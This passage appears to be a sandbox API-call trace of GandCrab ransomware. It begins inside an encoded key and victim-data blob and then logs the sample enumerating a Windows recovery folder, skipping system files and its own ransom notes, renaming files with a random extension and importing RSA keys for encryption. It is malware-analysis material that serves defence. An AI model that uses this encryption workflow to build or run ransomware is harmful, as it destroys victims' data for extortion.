x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.741] WriteFile (in: hFile=0x228, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0067.742] CloseHandle (hObject=0x228) returned 1 [0067.743] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.743] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.743] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xd, wMilliseconds=0x37)) [0067.743] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.743] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.744] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.744] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock") returned 46 [0067.744] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\recovery\\windowsre\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x228 [0067.746] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.746] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.746] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\") returned 22 [0067.746] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="*" | out: lpString1="C:\\Recovery\\WindowsRE\\*") returned="C:\\Recovery\\WindowsRE\\*" [0067.747] FindFirstFileExW (in: lpFileName="C:\\Recovery\\WindowsRE\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x4ca078 [0067.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.747] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.747] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.747] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.747] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.747] lstrcmpW (lpString1="boot.sdi", lpString2=".") returned 1 [0067.747] lstrcmpW (lpString1="boot.sdi", lpString2="..") returned 1 [0067.747] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="boot.sdi" | out: lpString1="C:\\Recovery\\WindowsRE\\boot.sdi") returned="C:\\Recovery\\WindowsRE\\boot.sdi" [0067.747] lstrlenW (lpString=".titwmvjl") returned 9 [0067.748] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0067.748] VirtualAlloc (lpAddress=0x0, dwSize=0x7c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.748] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\WindowsRE\\boot.sdi.titwmvjl") returned 39 [0067.748] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0067.748] lstrlenW (lpString=".sdi") returned 4 [0067.748] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.748] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".sdi ") returned 5 [0067.748] lstrcmpiW (lpString1=".sdi", lpString2=".titwmvjl") returned -1 [0067.748] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.748] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0067.748] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0067.748] lstrcmpiW (lpString1="boot.sdi", lpString2="desktop.ini") returned -1 [0067.748] lstrcmpiW (lpString1="boot.sdi", lpString2="autorun.inf") returned 1 [0067.748] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="iconcache.db") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="bootsect.bak") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="boot.ini") returned 1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat.log") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="thumbs.db") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="KRAB-DECRYPT.html") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="CRAB-DECRYPT.html") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="KRAB-DECRYPT.txt") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="CRAB-DECRYPT.txt") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="ntldr") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="NTDETECT.COM") returned -1 [0067.749] lstrcmpiW (lpString1="boot.sdi", lpString2="Bootfont.bin") returned -1 [0067.749] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\boot.sdi") returned 30 [0067.749] lstrlenW (lpString=".sdi") returned 4 [0067.749] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.749] wsprintfW (in: param_1=0x2610000, param_2="%s " | out: param_1=".sdi ") returned 5 [0067.749] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.750] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.750] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "c:\\recovery\\windowsre\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0067.750] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.750] ReadFile (in: hFile=0x230, lpBuffer=0x2610000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0067.760] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.760] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.760] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0067.761] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2620000 [0067.761] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0067.761] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0067.761] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0067.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.761] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0067.761] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.762] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0067.762] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2620000 [0067.762] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0067.762] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0067.762] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0067.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.762] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0067.762] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.763] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0067.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.763] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4ca178) returned 1 [0067.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.763] CryptGetKeyParam (in: hKey=0x4ca178, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0067.763] LoadLibraryA (lpLibFileName="advapi32.dll") 